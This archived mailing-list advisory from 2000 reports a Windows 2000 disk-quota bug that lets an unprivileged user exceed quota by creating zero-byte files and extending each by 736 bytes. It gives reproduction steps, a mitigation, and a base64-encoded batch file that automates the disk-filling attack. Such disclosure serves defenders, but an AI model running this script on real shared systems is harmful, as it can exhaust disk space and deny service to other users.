--Message-Boundary-10304 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Content-description: Mail message body I've been looking into disk quotas under Windows 2000 and have uncovered a few anomalies. On top of a few peculiarities there appears to be a bug which allows a user to exceed their disk quota by as much as they wish. *** The problem: Tested with Windows 2000 Professional build 2195 (release version). Existing files can be extended even if a user is over quota. If exploited by a malicious user then at best it is a nuisance at worst it may act as a DoS if the disk if filled. *** Description: After playing around with the newly introduced disk quotas in Windows 2000 I soon uncovered a bug which would allow an ordinary, unprivileged user to exceed their allocated disk quota and fill a disk/partition. Under normal circumstances when a user is under quota I discovered by experiment that new files can be created upto a size of (Quota - UsedSpace + 2KB - 1byte), i.e. they can go overquota by up to 2047 bytes. Not too much of a problem. Extending existing files can be up to (Quota - UsedSpace +1KB -1byte) i.e. up to 1023 bytes overquota - nothing much to be worried about. However, if you are overquota new file creation is only possible upto 728 bytes if (UsedSpace < Quota+1KB), i.e. you havn't gone more than 1KB overquota. Exisiting files can be extended by up to 736 bytes up until (UsedSpace >= Quota+1KB). Using this point alone, I created a lot of files with "echo.>file0000" at 2 bytes each to use up the user allocated diskquota and extended them up to the 736 byte limit per file - I was now way over quota. The limit of how far over quota I could go depended on my initial quota and how many tiny files I could create up until I hit the quota then extending them all. Then I thought "What if I create 0 byte files?". Oh dear! If you are under quota you can create as many 0 byte files as you wish. They count towards nothing. Then extend these files by 736 bytes and your disk starts filling up and up and up... *** To recreate (typical example): Create an ordinary unprivileged user and give them a diskquota of, say, 1MB. Open a command prompt and using whatever means you wish, create a lot of 0 byte files (e.g. SHIFT>FILE0000). Then append/extend those files by up to 736 bytes (e.g. ECHO 736-characters-here>>FILE0000). If you try and extend beyond 736 bytes the file and it's contents get chopped off at 674 bytes so for speed disk filling with fewer files don't try and go beyond 736 bytes. See attachment for a batch file to create 10,000 of 0 byte files then extend them all to 736 bytes. *** Workaround/fix: None known. However, to prevent DoS on servers you should not permit people to write to the same partiton that the operating system resides on. Dave, http://redirect.to/null/ PGP fingerprint: AE23 A19C 3E5E 74F4 2193 4BB3 E154 54AF --Message-Boundary-10304 Content-type: text/plain; charset=US-ASCII Content-disposition: inline Content-description: Attachment information. The following section of this message contains a file attachment prepared for transmission using the Internet MIME message format. If you are using Pegasus Mail, or any another MIME-compliant system, you should be able to save it or view it from within your mailer. If you cannot, please ask your system administrator for assistance. ---- File information ----------- File: OverQuota.BAT Date: 25 Feb 2000, 22:03 Size: 1008 bytes. Type: Text --Message-Boundary-10304 Content-type: Application/Octet-stream; name="OverQuota.BAT"; type=Text Content-disposition: attachment; filename="OverQuota.BAT" Content-transfer-encoding: BASE64 QGVjaG8gb2ZmDQplY2hvIFdpbmRvd3MgMjAwMCBkaXNrIChvdmVyKXF1b3RhIGV4cGxvaXQN CmVjaG8gRGF2ZSBUYXJiYXR0IDI2LzAyLzIwMDAgaHR0cDovL3JlZGlyZWN0LnRvL251bGwv DQpyZW0NCnJlbSBDcmVhdGUgMTAsMDAwIHplcm8gYnl0ZSBmaWxlcyAoJ1JFTT5maWxlbmFt ZScgdXNlZCB0byB3b3JrIGJ1dCBub3QgYW55IG1vcmUpDQplY2hvIENyZWF0aW5nIDEwLDAw MCB6ZXJvIGJ5dGUgZmlsZXMuLi4NCmZvciAlJWkgaW4gKDAgMSAyIDMgNCA1IDYgNyA4IDkp IGRvIGZvciAlJWogaW4gKDAgMSAyIDMgNCA1IDYgNyA4IDkpIGRvIGZvciAlJWsgaW4gKDAg MSAyIDMgNCA1IDYgNyA4IDkpIGRvIGZvciAlJWwgaW4gKDAgMSAyIDMgNCA1IDYgNyA4IDkp IGRvIHNoaWZ0PkZJTEUlJWklJWolJWslJWwNCnJlbQ0KcmVtIENyZWF0ZSBhIDczNiBieXRl IGZpbGUgKHRoZSBsYXJnZXN0IGV4dGVudCB0aGF0IHdvcmtzKQ0KZWNobyBDcmVhdGluZyA3 MzYgYnl0ZSBmaWxlLi4uDQpzaGlmdD43MzYudHh0DQpmb3IgJSVpIGluICgwIDEgMiAzIDQg NSA2IDcgOCA5IDEwIDExIDEyIDEzIDE0IDE1IDE2IDE3IDE4IDE5IDIwIDIxIDIyKSBkbyBm b3IgJSVqIGluICgwIDEgMiAzIDQgNSA2IDcgOCA5IDEwIDExIDEyIDEzIDE0IDE1KSBkbyBl Y2hvLj4+NzM2LnR4dA0KcmVtDQpyZW0gQXBwZW5kaW5nIHRoZSA3MzYgYnl0ZSBmaWxlIHRv IGFsbCB0aGUgZW1wdHkgb25lcyAoZXh0ZW5kIHRoZW0pDQplY2hvIEFwcGVuZGluZyA3MzYg Ynl0ZXMgdG8gYWxsIDEwLDAwMCBmaWxlcy4uLg0KZm9yICUlaSBpbiAoMCAxIDIgMyA0IDUg NiA3IDggOSkgZG8gZm9yICUlaiBpbiAoMCAxIDIgMyA0IDUgNiA3IDggOSkgZG8gZm9yICUl ayBpbiAoMCAxIDIgMyA0IDUgNiA3IDggOSkgZG8gZm9yICUlbCBpbiAoMCAxIDIgMyA0IDUg NiA3IDggOSkgZG8gdHlwZSA3MzYudHh0Pj5GSUxFJSVpJSVqJSVrJSVsDQpyZW0NCmVjaG8u DQplY2hvIERvbmUuIE1hc3NpdmVseSBvdmVyIHF1b3RhIQ0K --Message-Boundary-10304--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:37:54 PDT